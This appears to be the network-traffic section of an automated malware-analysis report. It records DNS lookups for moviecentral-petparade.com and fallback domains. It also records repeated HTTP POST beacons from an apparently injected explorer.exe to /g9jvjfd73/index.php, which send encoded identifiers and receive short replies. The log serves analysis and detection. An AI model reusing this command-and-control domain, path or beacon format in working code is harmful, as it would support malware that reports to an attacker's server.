                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.222022057 CET192.168.2.91.1.1.10xa274Standard query (0)moviecentral-petparade.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.222542048 CET192.168.2.91.1.1.10x99ddStandard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.222728014 CET192.168.2.91.1.1.10x96e3Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:38.893219948 CET192.168.2.91.1.1.10x6bd3Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:38.893219948 CET192.168.2.91.1.1.10xbae6Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:43.672857046 CET192.168.2.91.1.1.10xfe60Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:43.673258066 CET192.168.2.91.1.1.10x6d6aStandard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.953084946 CET192.168.2.91.1.1.10x60ceStandard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.953084946 CET192.168.2.91.1.1.10x83beStandard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.610634089 CET192.168.2.91.1.1.10x3ca3Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.610805035 CET192.168.2.91.1.1.10xa7e5Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:00.905236006 CET192.168.2.91.1.1.10xcfe3Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:00.905428886 CET192.168.2.91.1.1.10x37edStandard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:05.680773973 CET192.168.2.91.1.1.10xdbadStandard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:05.685832977 CET192.168.2.91.1.1.10x7e52Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.969189882 CET192.168.2.91.1.1.10xf9ecStandard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.969480991 CET192.168.2.91.1.1.10x9ed9Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.626781940 CET192.168.2.91.1.1.10xc3fdStandard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.627121925 CET192.168.2.91.1.1.10xc532Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.951883078 CET192.168.2.91.1.1.10x12f5Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.951883078 CET192.168.2.91.1.1.10xa8c0Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.764246941 CET192.168.2.91.1.1.10x3810Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.764679909 CET192.168.2.91.1.1.10x66acStandard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.422615051 CET192.168.2.91.1.1.10x4796Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.422672033 CET192.168.2.91.1.1.10xf928Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.785851002 CET192.168.2.91.1.1.10xaca9Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.786953926 CET192.168.2.91.1.1.10x23Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.563127041 CET192.168.2.91.1.1.10xf0f5Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.624917030 CET192.168.2.91.1.1.10xfcd6Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:49.910510063 CET192.168.2.91.1.1.10x5220Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:50.010185003 CET192.168.2.91.1.1.10xaec1Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.579276085 CET192.168.2.91.1.1.10x3862Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.672873974 CET192.168.2.91.1.1.10xf968Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:59.454194069 CET192.168.2.91.1.1.10xdb8cStandard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.875622034 CET192.168.2.91.1.1.10xab11Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.657006025 CET192.168.2.91.1.1.10x4ce2Standard query (0)moviecentral-petparade3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.734827995 CET192.168.2.91.1.1.10x2be6Standard query (0)moviecentral-petparade2.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Oct 31, 2024 14:24:58.010600090 CET1.1.1.1192.168.2.90x1b4dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:24:58.010600090 CET1.1.1.1192.168.2.90x1b4dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.229768991 CET1.1.1.1192.168.2.90x99ddName error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.230401039 CET1.1.1.1192.168.2.90xa274No error (0)moviecentral-petparade.com172.67.213.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.230401039 CET1.1.1.1192.168.2.90xa274No error (0)moviecentral-petparade.com104.21.23.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.230412960 CET1.1.1.1192.168.2.90x96e3Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:38.900721073 CET1.1.1.1192.168.2.90xbae6Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:38.901437998 CET1.1.1.1192.168.2.90x6bd3Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:43.680365086 CET1.1.1.1192.168.2.90x6d6aName error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:43.680381060 CET1.1.1.1192.168.2.90xfe60Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.960494995 CET1.1.1.1192.168.2.90x83beName error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.960515976 CET1.1.1.1192.168.2.90x60ceName error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.617914915 CET1.1.1.1192.168.2.90xa7e5Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.617927074 CET1.1.1.1192.168.2.90x3ca3Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:00.912453890 CET1.1.1.1192.168.2.90xcfe3Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:00.914242029 CET1.1.1.1192.168.2.90x37edName error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:05.687886953 CET1.1.1.1192.168.2.90xdbadName error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:05.693030119 CET1.1.1.1192.168.2.90x7e52Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.976218939 CET1.1.1.1192.168.2.90xf9ecName error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.977168083 CET1.1.1.1192.168.2.90x9ed9Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.638740063 CET1.1.1.1192.168.2.90xc532Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.639245033 CET1.1.1.1192.168.2.90xc3fdName error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.959871054 CET1.1.1.1192.168.2.90xa8c0Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.960345984 CET1.1.1.1192.168.2.90x12f5Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.771910906 CET1.1.1.1192.168.2.90x3810Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.775103092 CET1.1.1.1192.168.2.90x66acName error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.432398081 CET1.1.1.1192.168.2.90x4796Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.432430029 CET1.1.1.1192.168.2.90xf928Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.793663025 CET1.1.1.1192.168.2.90xaca9Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.796546936 CET1.1.1.1192.168.2.90x23Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.632249117 CET1.1.1.1192.168.2.90xfcd6Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.719285011 CET1.1.1.1192.168.2.90xf0f5Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:49.920998096 CET1.1.1.1192.168.2.90x5220Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:50.017549038 CET1.1.1.1192.168.2.90xaec1Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.586900949 CET1.1.1.1192.168.2.90x3862Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.680430889 CET1.1.1.1192.168.2.90xf968Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:26:59.463676929 CET1.1.1.1192.168.2.90xdb8cName error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.882936001 CET1.1.1.1192.168.2.90xab11Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.664279938 CET1.1.1.1192.168.2.90x4ce2Name error (3)moviecentral-petparade3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.742398977 CET1.1.1.1192.168.2.90x2be6Name error (3)moviecentral-petparade2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      • moviecentral-petparade.com
                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.949903172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.241723061 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:25:35.128082991 CET776INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:35 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uRvf81GJsIUlOGvHD3YFkeS6YNB9GKrv6gh48HzSVEF12iH67bwM6dvX6Qv7ZWfou9JeFZ7BXPLr4OVG9Kyv6g%2FYuSVQIgRZmxZA4bklPA%2B4wZJQGVMHIn8U5YZ1RL11pAr6ZRxrVlzbhkFWqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f8cc5b1f2d33-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2091&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      1192.168.2.949916172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.647644997 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:25:37.559220076 CET784INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:37 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBsb4xM0EaywKN%2Fwfnm3mhpmEMDYvjJQDaFHGJjICAsaxI3Yh4xKgoQNc0rSISbMd%2B8nZgslaa1S0RwxFExILe6gCw7uH%2BaiXX4ef70KqoZjNCW4K5OLnr5YP5UXkjaSVSkIaK5DHYvR4Nh4kg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f8db6cd36b49-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      2192.168.2.949930172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.202775955 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:25:40.089376926 CET782INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:40 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzGb%2FztY9KdQ3HFyNUMeJg4mBVxc2aAspWoPuPySGC%2FY1Nw9mR9MayOfzugQEplYt1Euo8sjBmqcdIhbvQQZ4EJ%2Fab2VUo3MfcDJx9dANYyk5m5jjMIX6C0WlZfr%2FlmWYk%2BMv5QO2o0GEiMdxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f8eb69444641-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      3192.168.2.949946172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.597575903 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:25:42.510982037 CET796INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:42 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYE%2Fy8To%2Fhtw%2BbU6%2FY9iXxcbLezcBHK9%2FvlxnVkD%2BbP3Ywy3hG3icmYHsidGfBnxqMYb2n8fyCSFznSNcdVap5F3o70iIlM%2BenWdjGNkWbXglQ%2BQknNfupSn6GmgthKsDPouh45O%2B3BXPN3CHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f8fa6a9be962-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      4192.168.2.949962172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.146783113 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:25:45.008002996 CET778INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:44 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20RxoggpMSurewfgTLd4uTxVpMdestMcekLc8PtILjTcD5i71cmEgDmgsIS13CC7jG%2Ffu%2Bzrwunh0jgPbjiLS5jp3A%2FEuLxLabiqZ0w70l1pcY8zlDYmzpqEO7AL4ZBVL4Ni8l7Mz6CAO4IHFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f90a5c1b2c89-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      5192.168.2.949975172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.521676064 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:25:47.403352022 CET789INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:47 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYn%2BsJvf6m2FKqyQujCZGKDgZyYv0YRogwdsPQ1QZ%2Fzoj9ms162%2BwhIZ%2BCzFMbvg%2Fk5Mgu8hoHNfIteT7%2F%2Fj46FJAvOt02TURidVCnGmxWCVxwXgCTnn7RE4BVqCGcKdl%2FhHNQmXUUubb6ISPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
